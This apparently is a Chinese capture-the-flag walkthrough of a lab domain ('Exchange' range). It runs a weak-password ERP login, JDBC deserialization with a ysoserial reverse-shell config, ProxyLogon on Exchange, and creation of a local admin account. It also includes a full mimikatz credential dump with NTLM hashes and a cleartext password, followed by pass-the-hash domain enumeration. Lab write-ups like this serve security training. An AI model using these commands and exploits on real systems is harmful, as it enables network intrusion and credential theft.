春秋云境-Exchange

fscan扫描

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
39.99.152.160:80 open
39.99.152.160:22 open
39.99.152.160:8000 open

8000端口admin/123456弱口令上去

华夏erp反序列化

发现没有后台洞，打jdbc，参考：https://www.cnblogs.com/kingbridge/articles/16720318.html

vps上起一个mysql服务https://github.com/fnmsd/MySQL_Fake_Server

config.json配置(ysoserial-all.jar和server.py放一起)，bash -c后面替换成base64后反弹shell的payload，其他照抄

{
        "config":{
            "ysoserialPath":"ysoserial-all.jar",
            "javaBinPath":"java",
            "fileOutputDir":"./fileOutput/",
            "displayFileContentOnScreen":true,
            "saveToFile":true
        },
        "fileread":{
            "win_ini":"c:\\windows\\win.ini",
            "win_hosts":"c:\\windows\\system32\\drivers\\etc\\hosts",
            "win":"c:\\windows\\",
            "linux_passwd":"/etc/passwd",
            "linux_hosts":"/etc/hosts",
            "index_php":"index.php",
            "ssrf":"https://www.baidu.com/",
            "__defaultFiles":["/etc/hosts","c:\\windows\\system32\\drivers\\etc\\hosts"]
        },
        "yso":{
            "Jdk7u21":["Jdk7u21","calc"],
            "CommonsCollections6":["CommonCollections6","bash -c {echo,base64反弹shell}|{base64,-d}|{bash,-i}"]
        }
    }

python3 server.py启动服务。

然后向网站请求的payload就是下面这个url编码后的,抓个包改一下路径

find / -name flag*

cat /root/flag/flag01.txt

内网渗透

接下来打内网，先上代理和fscan

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.3.12     is alive
(icmp) Target 172.22.3.2      is alive
(icmp) Target 172.22.3.9      is alive
(icmp) Target 172.22.3.26     is alive
[*] Icmp alive hosts len is: 4
172.22.3.12:8000 open
172.22.3.9:445 open
172.22.3.26:445 open
172.22.3.2:445 open
172.22.3.9:443 open
172.22.3.9:139 open
172.22.3.26:139 open
172.22.3.2:139 open
172.22.3.9:135 open
172.22.3.26:135 open
172.22.3.2:135 open
172.22.3.9:81 open
172.22.3.9:80 open
172.22.3.2:88 open
172.22.3.12:80 open
172.22.3.12:22 open
172.22.3.9:8172 open
172.22.3.9:808 open
[*] alive ports len is: 18
start vulscan
[*] NetInfo 
[*]172.22.3.9
   [->]XIAORANG-EXC01
   [->]172.22.3.9
[*] WebTitle http://172.22.3.12        code:200 len:19813  title:lumia
[*] NetInfo 
[*]172.22.3.2
   [->]XIAORANG-WIN16
   [->]172.22.3.2
[*] NetInfo 
[*]172.22.3.26
   [->]XIAORANG-PC
   [->]172.22.3.26
[*] NetBios 172.22.3.26     XIAORANG\XIAORANG-PC          
[*] NetBios 172.22.3.2      [+] DC:XIAORANG-WIN16.xiaorang.lab      Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.3.12:8000   code:302 len:0      title:None 跳转url: http://172.22.3.12:8000/login.html
[*] OsInfo 172.22.3.2   (Windows Server 2016 Datacenter 14393)
[*] WebTitle http://172.22.3.12:8000/login.html code:200 len:5662   title:Lumia ERP
[*] NetBios 172.22.3.9      XIAORANG-EXC01.xiaorang.lab         eWindows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.3.9:81      code:403 len:1157   title:403 - 禁止访问: 访问被拒绝。
[*] WebTitle https://172.22.3.9:8172   code:404 len:0      title:None
[*] WebTitle http://172.22.3.9         code:403 len:0      title:None
[*] WebTitle https://172.22.3.9        code:302 len:0      title:None 跳转url: https://172.22.3.9/owa/
[*] WebTitle https://172.22.3.9/owa/auth/logon.aspx?url=https%3a%2f%2f172.22.3.9%2fowa%2f&reason=0 code:200 len:28237  title:Outlook
已完成 18/18
[*] 扫描结束,耗时: 11.337402915s

分析一下

172.22.3.12     当前机器
172.22.3.9      域内Exchange机
172.22.3.2      域控
172.22.3.26     域内机器

172.22.3.9访问一下发现是Exchange Server 2016, 直接打ProxyLogon

proxychains python2 proxylogon.py 172.22.3.9 administrator@xiaorang.lab

打完会弹一个system的Shell，我们添加用户

net user calm qwer1234! /add
net localgroup administrators calm /add

rdp上去拿flag

上猕猴桃抓一下密码，记得管理员运行

.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > 1.txt

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # sekurlsa::logonpasswords

Authentication Id : 0 ; 10598763 (00000000:00a1b96b)
Session           : NetworkCleartext from 0
User Name         : HealthMailbox0d5918e
Domain            : XIAORANG
Logon Server      : XIAORANG-WIN16
Logon Time        : 2025/3/11 15:26:47
SID               : S-1-5-21-533686307-2117412543-4200729784-1136
	msv :	
	 [00000003] Primary
	 * Username : HealthMailbox0d5918e
	 * Domain   : XIAORANG
	 * NTLM     : d8ab6a5ecc31f0ee092162f6b4cbbb42
	 * SHA1     : ba8a181c30dd83e3cb8c8d62315ae23163340479
	 * DPAPI    : 608ba79cc390d4c930b34bb0e2fd9c35
	tspkg :	
	wdigest :	
	 * Username : HealthMailbox0d5918e
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : HealthMailbox0d5918e
	 * Domain   : XIAORANG.LAB
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 10000700 (00000000:0098993c)
Session           : RemoteInteractive from 3
User Name         : calm
Domain            : XIAORANG-EXC01
Logon Server      : XIAORANG-EXC01
Logon Time        : 2025/3/11 15:25:44
SID               : S-1-5-21-804691931-3750513266-524628342-1000
	msv :	
	 [00000003] Primary
	 * Username : calm
	 * Domain   : XIAORANG-EXC01
	 * NTLM     : 6912928308e3cda903e6d75bd6091a20
	 * SHA1     : 4687d6f9b23b55f21825bc5157fe2cbe707c07de
	tspkg :	
	wdigest :	
	 * Username : calm
	 * Domain   : XIAORANG-EXC01
	 * Password : (null)
	kerberos :	
	 * Username : calm
	 * Domain   : XIAORANG-EXC01
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 9993321 (00000000:00987c69)
Session           : Interactive from 3
User Name         : DWM-3
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/11 15:25:43
SID               : S-1-5-90-0-3
	msv :	
	 [00000003] Primary
	 * Username : XIAORANG-EXC01$
	 * Domain   : XIAORANG
	 * NTLM     : 55c05b3a95ba11efa84aa33e20861e6f
	 * SHA1     : a551d481dcc12fcc09b5f27660b7b78d12b0523a
	tspkg :	
	wdigest :	
	 * Username : XIAORANG-EXC01$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : XIAORANG-EXC01$
	 * Domain   : xiaorang.lab
	 * Password : 0f 3a 16 8a 52 bd 7d cc fe 2b 9c 57 8b f5 c7 7a c5 f0 a9 68 27 59 d1 8e a2 f1 ce af 48 b1 05 f2 1a 8d 9d 0c 85 7c 85 80 7e e3 0e 68 4c cc 8a f4 0e 93 af 23 26 4a 26 03 b3 2c 88 18 98 da db 21 93 40 d8 78 05 ec 4d 4e 2d d4 55 fe c6 2b 31 d6 11 fe dc 51 5c 00 c1 eb 67 a1 15 d0 56 c7 31 dd da dd f8 42 19 e0 9a 6f 89 76 bf 17 de be 6e cf a4 1f 09 8d 12 b2 83 69 83 e1 e9 32 56 ee 43 47 19 35 66 f5 e9 44 ee 5d 90 e1 60 01 bd 46 12 e7 54 1c 84 14 58 4a a4 00 18 ce 93 6d 9c b5 0a 3d 6d d9 db 02 86 44 1e 1b fc 62 73 b0 51 8a 09 44 50 dc 14 b1 38 d2 1d cd 71 d3 ed e5 c6 a2 1d 07 17 bd 2f 9b 58 79 91 d6 ed 73 76 a9 a8 47 fe 28 eb 99 f0 c0 52 72 8b 29 3d ea e1 41 79 e7 59 39 22 b0 0b 66 f9 ea c1 70 02 59 9e df a2 1d b8 96 
	ssp :	
	credman :	

Authentication Id : 0 ; 9993305 (00000000:00987c59)
Session           : Interactive from 3
User Name         : DWM-3
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/11 15:25:43
SID               : S-1-5-90-0-3
	msv :	
	 [00000003] Primary
	 * Username : XIAORANG-EXC01$
	 * Domain   : XIAORANG
	 * NTLM     : 55c05b3a95ba11efa84aa33e20861e6f
	 * SHA1     : a551d481dcc12fcc09b5f27660b7b78d12b0523a
	tspkg :	
	wdigest :	
	 * Username : XIAORANG-EXC01$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : XIAORANG-EXC01$
	 * Domain   : xiaorang.lab
	 * Password : 0f 3a 16 8a 52 bd 7d cc fe 2b 9c 57 8b f5 c7 7a c5 f0 a9 68 27 59 d1 8e a2 f1 ce af 48 b1 05 f2 1a 8d 9d 0c 85 7c 85 80 7e e3 0e 68 4c cc 8a f4 0e 93 af 23 26 4a 26 03 b3 2c 88 18 98 da db 21 93 40 d8 78 05 ec 4d 4e 2d d4 55 fe c6 2b 31 d6 11 fe dc 51 5c 00 c1 eb 67 a1 15 d0 56 c7 31 dd da dd f8 42 19 e0 9a 6f 89 76 bf 17 de be 6e cf a4 1f 09 8d 12 b2 83 69 83 e1 e9 32 56 ee 43 47 19 35 66 f5 e9 44 ee 5d 90 e1 60 01 bd 46 12 e7 54 1c 84 14 58 4a a4 00 18 ce 93 6d 9c b5 0a 3d 6d d9 db 02 86 44 1e 1b fc 62 73 b0 51 8a 09 44 50 dc 14 b1 38 d2 1d cd 71 d3 ed e5 c6 a2 1d 07 17 bd 2f 9b 58 79 91 d6 ed 73 76 a9 a8 47 fe 28 eb 99 f0 c0 52 72 8b 29 3d ea e1 41 79 e7 59 39 22 b0 0b 66 f9 ea c1 70 02 59 9e df a2 1d b8 96 
	ssp :	
	credman :	

Authentication Id : 0 ; 2217558 (00000000:0021d656)
Session           : NetworkCleartext from 0
User Name         : HealthMailbox0d5918e
Domain            : XIAORANG
Logon Server      : XIAORANG-WIN16
Logon Time        : 2025/3/11 14:49:24
SID               : S-1-5-21-533686307-2117412543-4200729784-1136
	msv :	
	 [00000003] Primary
	 * Username : HealthMailbox0d5918e
	 * Domain   : XIAORANG
	 * NTLM     : 2dd2fea458c9690609313e7d7c1d1094
	 * SHA1     : 710b23fb4ffb87bf98b5821e0e7a9b622e0a3283
	 * DPAPI    : 4bb9f57b64b8fb82bcaabba12708f6bb
	tspkg :	
	wdigest :	
	 * Username : HealthMailbox0d5918e
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : HealthMailbox0d5918e
	 * Domain   : XIAORANG.LAB
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 108951 (00000000:0001a997)
Session           : Service from 0
User Name         : Zhangtong
Domain            : XIAORANG
Logon Server      : XIAORANG-WIN16
Logon Time        : 2025/3/11 14:47:44
SID               : S-1-5-21-533686307-2117412543-4200729784-1147
	msv :	
	 [00000003] Primary
	 * Username : Zhangtong
	 * Domain   : XIAORANG
	 * NTLM     : 22c7f81993e96ac83ac2f3f1903de8b4
	 * SHA1     : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
	 * DPAPI    : ed14c3c4ef895b1d11b04fb4e56bb83b
	tspkg :	
	wdigest :	
	 * Username : Zhangtong
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : Zhangtong
	 * Domain   : XIAORANG.LAB
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 66126 (00000000:0001024e)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/11 14:47:43
SID               : S-1-5-90-0-1
	msv :	
	 [00000003] Primary
	 * Username : XIAORANG-EXC01$
	 * Domain   : XIAORANG
	 * NTLM     : 9587463cfa3fd1ea760c401e2c52e224
	 * SHA1     : 162fc915ffccfa73c6f53b3c92f02690ccf7831c
	tspkg :	
	wdigest :	
	 * Username : XIAORANG-EXC01$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : XIAORANG-EXC01$
	 * Domain   : xiaorang.lab
	 * Password : 12 ae e6 f2 22 80 c0 a3 cd 84 c9 94 de ef 96 52 79 ff ea 99 f6 9c 67 48 10 08 e7 99 1a fa 51 11 ad b6 c1 79 cc 6d 04 b2 22 01 47 b0 53 b5 7e ff df 04 21 34 ae 7b ee c9 cf b1 c1 d3 c0 63 d3 d7 6a f2 3a 38 83 ac cf d2 93 7b d3 0b bb d6 a5 8d 7c cd f1 77 65 0b 8c 77 dd 98 49 3c 21 f0 5d fc a7 8f c7 e0 5b f7 96 4d d2 46 14 81 8f 4f a7 a4 27 11 09 03 f9 f4 0d ce 71 4d 8d 64 c3 a9 6b 5c 4a 77 ba ac 33 1a 49 60 11 bd 4d b2 1e 98 05 1a c1 03 5b c6 cf 4e 1c d3 83 10 52 51 68 c4 b1 e0 65 c2 36 f3 a6 3f 66 c6 95 8c 3d 47 ab 9b cb 35 bd 53 f0 6f 13 ae 48 28 5e cf 5b ee 45 ce 7f 10 47 aa e6 f0 d3 09 c0 b3 ad ef 24 00 c5 c8 f0 7f a5 06 93 0e f5 a4 2a ec d0 25 96 4d a4 88 d3 55 94 d9 94 81 ef 8b ba 9e 89 b6 36 dc 88 64 8d 96 
	ssp :	
	credman :	

Authentication Id : 0 ; 66047 (00000000:000101ff)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/11 14:47:43
SID               : S-1-5-90-0-1
	msv :	
	 [00000003] Primary
	 * Username : XIAORANG-EXC01$
	 * Domain   : XIAORANG
	 * NTLM     : 55c05b3a95ba11efa84aa33e20861e6f
	 * SHA1     : a551d481dcc12fcc09b5f27660b7b78d12b0523a
	tspkg :	
	wdigest :	
	 * Username : XIAORANG-EXC01$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : XIAORANG-EXC01$
	 * Domain   : xiaorang.lab
	 * Password : 0f 3a 16 8a 52 bd 7d cc fe 2b 9c 57 8b f5 c7 7a c5 f0 a9 68 27 59 d1 8e a2 f1 ce af 48 b1 05 f2 1a 8d 9d 0c 85 7c 85 80 7e e3 0e 68 4c cc 8a f4 0e 93 af 23 26 4a 26 03 b3 2c 88 18 98 da db 21 93 40 d8 78 05 ec 4d 4e 2d d4 55 fe c6 2b 31 d6 11 fe dc 51 5c 00 c1 eb 67 a1 15 d0 56 c7 31 dd da dd f8 42 19 e0 9a 6f 89 76 bf 17 de be 6e cf a4 1f 09 8d 12 b2 83 69 83 e1 e9 32 56 ee 43 47 19 35 66 f5 e9 44 ee 5d 90 e1 60 01 bd 46 12 e7 54 1c 84 14 58 4a a4 00 18 ce 93 6d 9c b5 0a 3d 6d d9 db 02 86 44 1e 1b fc 62 73 b0 51 8a 09 44 50 dc 14 b1 38 d2 1d cd 71 d3 ed e5 c6 a2 1d 07 17 bd 2f 9b 58 79 91 d6 ed 73 76 a9 a8 47 fe 28 eb 99 f0 c0 52 72 8b 29 3d ea e1 41 79 e7 59 39 22 b0 0b 66 f9 ea c1 70 02 59 9e df a2 1d b8 96 
	ssp :	
	credman :	

Authentication Id : 0 ; 10614933 (00000000:00a1f895)
Session           : NetworkCleartext from 0
User Name         : HealthMailbox0d5918e
Domain            : XIAORANG
Logon Server      : XIAORANG-WIN16
Logon Time        : 2025/3/11 15:27:00
SID               : S-1-5-21-533686307-2117412543-4200729784-1136
	msv :	
	 [00000003] Primary
	 * Username : HealthMailbox0d5918e
	 * Domain   : XIAORANG
	 * NTLM     : d8ab6a5ecc31f0ee092162f6b4cbbb42
	 * SHA1     : ba8a181c30dd83e3cb8c8d62315ae23163340479
	 * DPAPI    : 608ba79cc390d4c930b34bb0e2fd9c35
	tspkg :	
	wdigest :	
	 * Username : HealthMailbox0d5918e
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : HealthMailbox0d5918e
	 * Domain   : XIAORANG.LAB
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 10000729 (00000000:00989959)
Session           : RemoteInteractive from 3
User Name         : calm
Domain            : XIAORANG-EXC01
Logon Server      : XIAORANG-EXC01
Logon Time        : 2025/3/11 15:25:44
SID               : S-1-5-21-804691931-3750513266-524628342-1000
	msv :	
	 [00000003] Primary
	 * Username : calm
	 * Domain   : XIAORANG-EXC01
	 * NTLM     : 6912928308e3cda903e6d75bd6091a20
	 * SHA1     : 4687d6f9b23b55f21825bc5157fe2cbe707c07de
	tspkg :	
	wdigest :	
	 * Username : calm
	 * Domain   : XIAORANG-EXC01
	 * Password : (null)
	kerberos :	
	 * Username : calm
	 * Domain   : XIAORANG-EXC01
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2025/3/11 14:47:45
SID               : S-1-5-17
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : XIAORANG-EXC01$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2025/3/11 14:47:27
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : XIAORANG-EXC01$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : xiaorang-exc01$
	 * Domain   : XIAORANG.LAB
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 8772690 (00000000:0085dc52)
Session           : Service from 0
User Name         : DefaultAppPool
Domain            : IIS APPPOOL
Logon Server      : (null)
Logon Time        : 2025/3/11 15:19:10
SID               : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
	msv :	
	 [00000003] Primary
	 * Username : XIAORANG-EXC01$
	 * Domain   : XIAORANG
	 * NTLM     : 55c05b3a95ba11efa84aa33e20861e6f
	 * SHA1     : a551d481dcc12fcc09b5f27660b7b78d12b0523a
	tspkg :	
	wdigest :	
	 * Username : XIAORANG-EXC01$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : XIAORANG-EXC01$
	 * Domain   : xiaorang.lab
	 * Password : 0f 3a 16 8a 52 bd 7d cc fe 2b 9c 57 8b f5 c7 7a c5 f0 a9 68 27 59 d1 8e a2 f1 ce af 48 b1 05 f2 1a 8d 9d 0c 85 7c 85 80 7e e3 0e 68 4c cc 8a f4 0e 93 af 23 26 4a 26 03 b3 2c 88 18 98 da db 21 93 40 d8 78 05 ec 4d 4e 2d d4 55 fe c6 2b 31 d6 11 fe dc 51 5c 00 c1 eb 67 a1 15 d0 56 c7 31 dd da dd f8 42 19 e0 9a 6f 89 76 bf 17 de be 6e cf a4 1f 09 8d 12 b2 83 69 83 e1 e9 32 56 ee 43 47 19 35 66 f5 e9 44 ee 5d 90 e1 60 01 bd 46 12 e7 54 1c 84 14 58 4a a4 00 18 ce 93 6d 9c b5 0a 3d 6d d9 db 02 86 44 1e 1b fc 62 73 b0 51 8a 09 44 50 dc 14 b1 38 d2 1d cd 71 d3 ed e5 c6 a2 1d 07 17 bd 2f 9b 58 79 91 d6 ed 73 76 a9 a8 47 fe 28 eb 99 f0 c0 52 72 8b 29 3d ea e1 41 79 e7 59 39 22 b0 0b 66 f9 ea c1 70 02 59 9e df a2 1d b8 96 
	ssp :	
	credman :	

Authentication Id : 0 ; 1954603 (00000000:001dd32b)
Session           : RemoteInteractive from 2
User Name         : Zhangtong
Domain            : XIAORANG
Logon Server      : XIAORANG-WIN16
Logon Time        : 2025/3/11 14:49:11
SID               : S-1-5-21-533686307-2117412543-4200729784-1147
	msv :	
	 [00000003] Primary
	 * Username : Zhangtong
	 * Domain   : XIAORANG
	 * NTLM     : 22c7f81993e96ac83ac2f3f1903de8b4
	 * SHA1     : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
	 * DPAPI    : ed14c3c4ef895b1d11b04fb4e56bb83b
	tspkg :	
	wdigest :	
	 * Username : Zhangtong
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : Zhangtong
	 * Domain   : XIAORANG.LAB
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 1880438 (00000000:001cb176)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/11 14:49:10
SID               : S-1-5-90-0-2
	msv :	
	 [00000003] Primary
	 * Username : XIAORANG-EXC01$
	 * Domain   : XIAORANG
	 * NTLM     : 55c05b3a95ba11efa84aa33e20861e6f
	 * SHA1     : a551d481dcc12fcc09b5f27660b7b78d12b0523a
	tspkg :	
	wdigest :	
	 * Username : XIAORANG-EXC01$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : XIAORANG-EXC01$
	 * Domain   : xiaorang.lab
	 * Password : 0f 3a 16 8a 52 bd 7d cc fe 2b 9c 57 8b f5 c7 7a c5 f0 a9 68 27 59 d1 8e a2 f1 ce af 48 b1 05 f2 1a 8d 9d 0c 85 7c 85 80 7e e3 0e 68 4c cc 8a f4 0e 93 af 23 26 4a 26 03 b3 2c 88 18 98 da db 21 93 40 d8 78 05 ec 4d 4e 2d d4 55 fe c6 2b 31 d6 11 fe dc 51 5c 00 c1 eb 67 a1 15 d0 56 c7 31 dd da dd f8 42 19 e0 9a 6f 89 76 bf 17 de be 6e cf a4 1f 09 8d 12 b2 83 69 83 e1 e9 32 56 ee 43 47 19 35 66 f5 e9 44 ee 5d 90 e1 60 01 bd 46 12 e7 54 1c 84 14 58 4a a4 00 18 ce 93 6d 9c b5 0a 3d 6d d9 db 02 86 44 1e 1b fc 62 73 b0 51 8a 09 44 50 dc 14 b1 38 d2 1d cd 71 d3 ed e5 c6 a2 1d 07 17 bd 2f 9b 58 79 91 d6 ed 73 76 a9 a8 47 fe 28 eb 99 f0 c0 52 72 8b 29 3d ea e1 41 79 e7 59 39 22 b0 0b 66 f9 ea c1 70 02 59 9e df a2 1d b8 96 
	ssp :	
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : XIAORANG-EXC01$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2025/3/11 14:47:42
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : XIAORANG-EXC01$
	 * Domain   : XIAORANG
	 * NTLM     : 55c05b3a95ba11efa84aa33e20861e6f
	 * SHA1     : a551d481dcc12fcc09b5f27660b7b78d12b0523a
	tspkg :	
	wdigest :	
	 * Username : XIAORANG-EXC01$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : xiaorang-exc01$
	 * Domain   : XIAORANG.LAB
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 23747 (00000000:00005cc3)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2025/3/11 14:47:27
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : XIAORANG-EXC01$
	 * Domain   : XIAORANG
	 * NTLM     : 55c05b3a95ba11efa84aa33e20861e6f
	 * SHA1     : a551d481dcc12fcc09b5f27660b7b78d12b0523a
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	 [00000000]
	 * Username : HealthMailbox0d5918ea7298475bbbb7e3602e1e289d@xiaorang.lab
	 * Domain   : (null)
	 * Password : Mh*vj]Z]Q02hqT+VLOB:_Se]zl@VS+v>4Z^P+c=u;VQf+MiJD(?^=w#RmpxDeEI29QR&e%^9nn3s*35h74jW5JeWV8^8fa#f9SIAv5)Dl5#hqaUZO2)m-)VT=huQe)[c
	credman :	

Authentication Id : 0 ; 2399786 (00000000:00249e2a)
Session           : NetworkCleartext from 0
User Name         : HealthMailbox0d5918e
Domain            : XIAORANG
Logon Server      : XIAORANG-WIN16
Logon Time        : 2025/3/11 14:49:39
SID               : S-1-5-21-533686307-2117412543-4200729784-1136
	msv :	
	 [00000003] Primary
	 * Username : HealthMailbox0d5918e
	 * Domain   : XIAORANG
	 * NTLM     : 2dd2fea458c9690609313e7d7c1d1094
	 * SHA1     : 710b23fb4ffb87bf98b5821e0e7a9b622e0a3283
	 * DPAPI    : 4bb9f57b64b8fb82bcaabba12708f6bb
	tspkg :	
	wdigest :	
	 * Username : HealthMailbox0d5918e
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : HealthMailbox0d5918e
	 * Domain   : XIAORANG.LAB
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 1880415 (00000000:001cb15f)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/11 14:49:10
SID               : S-1-5-90-0-2
	msv :	
	 [00000003] Primary
	 * Username : XIAORANG-EXC01$
	 * Domain   : XIAORANG
	 * NTLM     : 55c05b3a95ba11efa84aa33e20861e6f
	 * SHA1     : a551d481dcc12fcc09b5f27660b7b78d12b0523a
	tspkg :	
	wdigest :	
	 * Username : XIAORANG-EXC01$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : XIAORANG-EXC01$
	 * Domain   : xiaorang.lab
	 * Password : 0f 3a 16 8a 52 bd 7d cc fe 2b 9c 57 8b f5 c7 7a c5 f0 a9 68 27 59 d1 8e a2 f1 ce af 48 b1 05 f2 1a 8d 9d 0c 85 7c 85 80 7e e3 0e 68 4c cc 8a f4 0e 93 af 23 26 4a 26 03 b3 2c 88 18 98 da db 21 93 40 d8 78 05 ec 4d 4e 2d d4 55 fe c6 2b 31 d6 11 fe dc 51 5c 00 c1 eb 67 a1 15 d0 56 c7 31 dd da dd f8 42 19 e0 9a 6f 89 76 bf 17 de be 6e cf a4 1f 09 8d 12 b2 83 69 83 e1 e9 32 56 ee 43 47 19 35 66 f5 e9 44 ee 5d 90 e1 60 01 bd 46 12 e7 54 1c 84 14 58 4a a4 00 18 ce 93 6d 9c b5 0a 3d 6d d9 db 02 86 44 1e 1b fc 62 73 b0 51 8a 09 44 50 dc 14 b1 38 d2 1d cd 71 d3 ed e5 c6 a2 1d 07 17 bd 2f 9b 58 79 91 d6 ed 73 76 a9 a8 47 fe 28 eb 99 f0 c0 52 72 8b 29 3d ea e1 41 79 e7 59 39 22 b0 0b 66 f9 ea c1 70 02 59 9e df a2 1d b8 96 
	ssp :	
	credman :	

Authentication Id : 0 ; 105109 (00000000:00019a95)
Session           : Service from 0
User Name         : Zhangtong
Domain            : XIAORANG
Logon Server      : XIAORANG-WIN16
Logon Time        : 2025/3/11 14:47:44
SID               : S-1-5-21-533686307-2117412543-4200729784-1147
	msv :	
	 [00000003] Primary
	 * Username : Zhangtong
	 * Domain   : XIAORANG
	 * NTLM     : 22c7f81993e96ac83ac2f3f1903de8b4
	 * SHA1     : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
	 * DPAPI    : ed14c3c4ef895b1d11b04fb4e56bb83b
	tspkg :	
	wdigest :	
	 * Username : Zhangtong
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : Zhangtong
	 * Domain   : XIAORANG.LAB
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2025/3/11 14:47:43
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	

mimikatz(commandline) # exit
Bye!

这两个比较有用

Zhangtong
22c7f81993e96ac83ac2f3f1903de8b4
 
XIAORANG-EXC01$
55c05b3a95ba11efa84aa33e20861e6f

传个Adinfo收集信息

.\Adinfo_win.exe -d xiaorang.lab --dc 172.22.3.2 -u XIAORANG-EXC01$ -H 55c05b3a95ba11efa84aa33e20861e6f

           _____  _        __
     /\   |  __ \(_)      / _|
    /  \  | |  | |_ _ __ | |_ ___
   / /\ \ | |  | | | '_ \|  _/ _ \     Tools that collect information from domain
  / ____ \| |__| | | | | | || (_) |
 /_/    \_\_____/|_|_| |_|_| \___/     v1.5 by lzz

[i] Try to connect '172.22.3.2'
[c] Auth Domain: xiaorang.lab
[c] Auth user: XIAORANG-EXC01$
[c] Auth hash: 55c05b3a95ba11efa84aa33e20861e6f
[c] connected successfully,try to dump domain info
[i] DomainVersion found!
                    [+] Windows 2016 Server operating system
[i] Domain SID:
                    [+] S-1-5-21-533686307-2117412543-4200729784
[i] Domain MAQ found
                    [+] 10
[i] Domain Account Policy found
                    [+] pwdHistory: 24
                    [+] minPwdLength: 7
                    [+] minPwdAge: 1(day)
                    [+] maxPwdAge: 10675199(day)
                    [+] lockoutThreshold: 0
                    [+] lockoutDuration: 30(min)
[i] Domain Controllers: 1 found
